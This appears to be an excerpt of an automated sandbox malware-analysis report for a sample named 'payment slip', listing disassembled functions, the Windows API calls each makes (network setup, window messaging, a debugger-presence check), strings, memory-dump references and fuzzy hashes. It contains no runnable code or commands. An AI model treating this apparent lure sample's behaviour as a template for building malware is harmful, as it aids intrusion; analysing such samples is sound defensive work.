                                        Function 000ACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000ACD7D
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000ACDA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                        • Instruction ID: edfb406784d3fe2f34ed96261c8450776eb7f4704b909bee274fd1c073034463
                                        • Opcode Fuzzy Hash: 3c6e2a43c4da2c98a335d7adbe14452d02315600fb119ef7060be55b7f53b71c
                                        • Instruction Fuzzy Hash: 0911CE71205636BAF7784BA68C89EF7BEACEF137A4F01422AB11987180D7749840D6F0
                                        Function 000C3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 000C34AB
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000C34BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                        • Instruction ID: 4f606b4f0fcfeba1c65d37d6421f22c3a8b3ee7adb547bda80beec2eae3dd946
                                        • Opcode Fuzzy Hash: b124ab85a0b504ac2a505de6131e22bff64f8b94b9f9b86f5125f791e2522308
                                        • Instruction Fuzzy Hash: B211BC71110208ABEB668F64DC84FEF37AAEB05374F508328FA64931E0C775EC919B60
                                        Function 000C4F80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,?,?,?), ref: 000C4FCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: U
                                        • API String ID: 3850602802-2399391058
                                        • Opcode ID: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                        • Instruction ID: 9eacc7426c48c3d5374c6fcffae2aac19cd1d32d238c22ef1b4fcc6dd2bf649c
                                        • Opcode Fuzzy Hash: 7c7a9a8185f07590b35f8dabd9c5407daa212ae5044ff59097d46ae73b8f8171
                                        • Instruction Fuzzy Hash: 4C21D07AA0011AEFDB15CFA8C950DEE7BB9FB4D340B104158FA05A7320D731E961EBA0
                                        Function 00096C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • CharUpperBuffW.USER32(?,?,?), ref: 00096CB6
                                        • _wcslen.LIBCMT ref: 00096CC2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: STOP
                                        • API String ID: 1256254125-2411985666
                                        • Opcode ID: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                        • Instruction ID: 3b27576b14f78e0f7ea44391f1608fb3c9943448e4be2b3b7cbb4f61e83f0724
                                        • Opcode Fuzzy Hash: de77d74c7984bc6aca7a07eef5bb411ca5111e8623c4479b01f10ca866db0105
                                        • Instruction Fuzzy Hash: 5701C032A145268ACF21AFBDDC819BF77E9EB61710B510538F86296191EA32E940E650
                                        Function 000490DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-2399391058
                                        • Opcode ID: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                        • Instruction ID: e946a91079054f5af61beaba6b22d80042b687e9fded2fddffe453071d984062
                                        • Opcode Fuzzy Hash: 040ae19cebc0dd5caf92899468f7c9b7cdcf338b2f4bb8147dcaa749bf4a1b12
                                        • Instruction Fuzzy Hash: 12113D35604604EFDB20DF19D850EA5B7E6FB89320F248269F9698B2A0C771E981CF90
                                        Function 00091CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00091D4C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                        • Instruction ID: c5d131cb4e1bd06b404a3620ea32c8502a6d0760f134e6c88d4b5b614eeca96a
                                        • Opcode Fuzzy Hash: 48f218fa25d449ed4532bfbc120b3dc4965ff7e1b18355c8f16e913e09ca4b1c
                                        • Instruction Fuzzy Hash: E901D471702219AB8F19EBA4CD55CFE77A8EF46390F040619F922672D2EA705908E760
                                        Function 00091BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 00091C46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                        • Instruction ID: c3f19aea89b4fa0db0f60621f082e408bfed9b825b981aef5d9d50f1dc6043df
                                        • Opcode Fuzzy Hash: 589fb9dffdfdc2d786bdfc869bf3e884206bd05c6df5a52da9b07bd7e0c8d225
                                        • Instruction Fuzzy Hash: D901A2B5B851096ADF15EBA0CE52EFF77EC9F51340F140019B916672C2EA70AE08E7B1
                                        Function 00091C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                          • Part of subcall function 00093CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00093CCA
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00091CC8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ClassMessageNameSend_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 624084870-1403004172
                                        • Opcode ID: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                        • Instruction ID: 024ce599bdb4089758a28438e3e6c3f54b5be5e5851129f8ce2c4d47d48dbf05
                                        • Opcode Fuzzy Hash: 40a01bef9b7892c75215fe1a631b1331f61fffc883e99efc507f1d93da88f491
                                        • Instruction Fuzzy Hash: 6E01ADB5B8011966DF15EBA0CA02EFE77EC9B11340F540025B906B72C2EAA09F08E6B1
                                        Function 000C90A1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0008769C,?,?,?), ref: 000C9111
                                          • Part of subcall function 00049944: GetWindowLongW.USER32(?,000000EB), ref: 00049952
                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 000C90F7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LongWindow$MessageProcSend
                                        • String ID: U
                                        • API String ID: 982171247-2399391058
                                        • Opcode ID: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                        • Instruction ID: d1b8728a5d8dcf904e89183555395bf1c0314233c71c75b053b3013b66d8fa69
                                        • Opcode Fuzzy Hash: 6259837a0159342dab81c282185acd48619630109b5ef90bffda297f264870ae
                                        • Instruction Fuzzy Hash: 0401BC30100204BBEB219F14DC4AFAA3BA6FB85765F14006CFA551A2E1CB726C91CB50
                                        Function 000B747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: 3, 3, 16, 1
                                        • API String ID: 176396367-3042988571
                                        • Opcode ID: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                        • Instruction ID: efb95153b906ceb65668031241f52209e4d6d6e094c974f2140b0704b9824aca
                                        • Opcode Fuzzy Hash: c35fd5f5c7995c3d12355b921b6813d8bfa43cad6b122f65076cce418de50b87
                                        • Instruction Fuzzy Hash: 8FE09B1661522024927112799CC29FF56C9DFC5752714182BFE89C2267EB94CDD193A1
                                        Function 00090B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00090B23
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Message
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 2030045667-4017498283
                                        • Opcode ID: 20c675d8cc4e99df4b6e7deba9e684b7be573669bdb059cf62df470cc2bec88a
                                        • Instruction ID: 4b7310273797221a175f82a3283486e221c52265c20df2247daa419c19667d45
                                        • Opcode Fuzzy Hash: 20c675d8cc4e99df4b6e7deba9e684b7be573669bdb059cf62df470cc2bec88a
                                        • Instruction Fuzzy Hash: 15E0D8312483083AE2143754BC03FDD7A84CF05B15F10442AFB8C598C38AE2249056AD
                                        Function 00050D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0004F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00050D71,?,?,?,0003100A), ref: 0004F7CE
                                        • IsDebuggerPresent.KERNEL32(?,?,?,0003100A), ref: 00050D75
                                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0003100A), ref: 00050D84
                                        Strings
                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00050D7F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                        • API String ID: 55579361-631824599
                                        • Opcode ID: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                        • Instruction ID: 2043778dbd4ae73c1cbb23d61b3e0be130f6dfa3a1c594e5f4f39979ad2d11f0
                                        • Opcode Fuzzy Hash: 2b398439e69c63e2cf5cbc42238a085ce2bb70c51b2814f23a289d18c440b823
                                        • Instruction Fuzzy Hash: 97E012742007528BE3749FB8D504B9B7BF5BF04745F048D2DE886C7652DBB9E4488BA1
                                        Function 0008D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: %.3d$X64
                                        • API String ID: 481472006-1077770165
                                        • Opcode ID: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                        • Instruction ID: d7a5d76dcd4e4438d37f64d2fadd7cce224b589ce0241ed945bd575da81bb041
                                        • Opcode Fuzzy Hash: 731ea787c32072eb7b3695a831c4b87af54123d9eda305c5caeb2e06b514742e
                                        • Instruction Fuzzy Hash: 62D012A1808119F9CB60A7D0DC49DBDB37CFB28301F508563F94A92080D624C5086765
                                        Function 000C2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C232C
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000C233F
                                          • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                        • Instruction ID: b366250a1b7fd531f4fe5c66ca88db9566a9639d639d933fcfc90b11031d30e5
                                        • Opcode Fuzzy Hash: f4d484bb4074074be37f43bb75f0d8dbcb2bb621243f99d7f09fbe64c554d300
                                        • Instruction Fuzzy Hash: 7AD01236794350B7F664B771DC0FFD67A149B00B14F004916B74AEA1D1C9F9A841DB54
                                        Function 000C2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000C236C
                                        • PostMessageW.USER32(00000000), ref: 000C2373
                                          • Part of subcall function 0009E97B: Sleep.KERNEL32 ref: 0009E9F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                        • Instruction ID: 78ddd81c65cbb5c419173e7460aa116da7a6d74a226305ad84585e3891810fbd
                                        • Opcode Fuzzy Hash: 47b3e9cc65be3afa2437a9568e355ce682ac7adf04a40da2e80ffb7438ea8e69
                                        • Instruction Fuzzy Hash: 58D0C9327953507AF664B771DC0FFC676149B04B14F004916B74AEA1D1C9B9A8419A54